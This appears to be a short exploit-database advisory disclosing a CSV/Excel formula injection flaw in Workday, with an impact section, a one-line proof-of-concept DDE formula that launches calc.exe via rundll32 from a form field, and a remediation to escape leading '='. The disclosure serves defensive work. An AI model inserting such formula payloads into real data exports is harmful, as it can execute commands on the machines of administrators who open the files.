Skip to main content
# Exploit Title: Workday  - CSV Injection

# Exploit Author: sinfosec

2019-06-04

Product & Service Introduction:

===============================

Workday, Inc. is an on‑demand financial management and human capital management software vendor

It is designed latest security and code standards and it is ready for high availability web sites.

Impact
======
Arbitrary formulas can be injected into CSV/Excel files.
This can potentially lead to remote code execution at the client (DDE) or data leakage via maliciously injected hyperlinks.

Proof of Concept
============
In order to exploit this vulnerability, the attacker needs to insert an Excel formula into any of the contact form fields available. If an administrator/hr chooses to export this file as Excel/CSV file, the file will contain the formula. If he then opens the file and accesses the shell, the formula will be calculated.

Example:

=rundll32|'URL.dll,OpenURL calc.exe'!A

Solution
========

The plugin should escape fields starting with '=' when it exports data to CSV or Excel formats.

Comments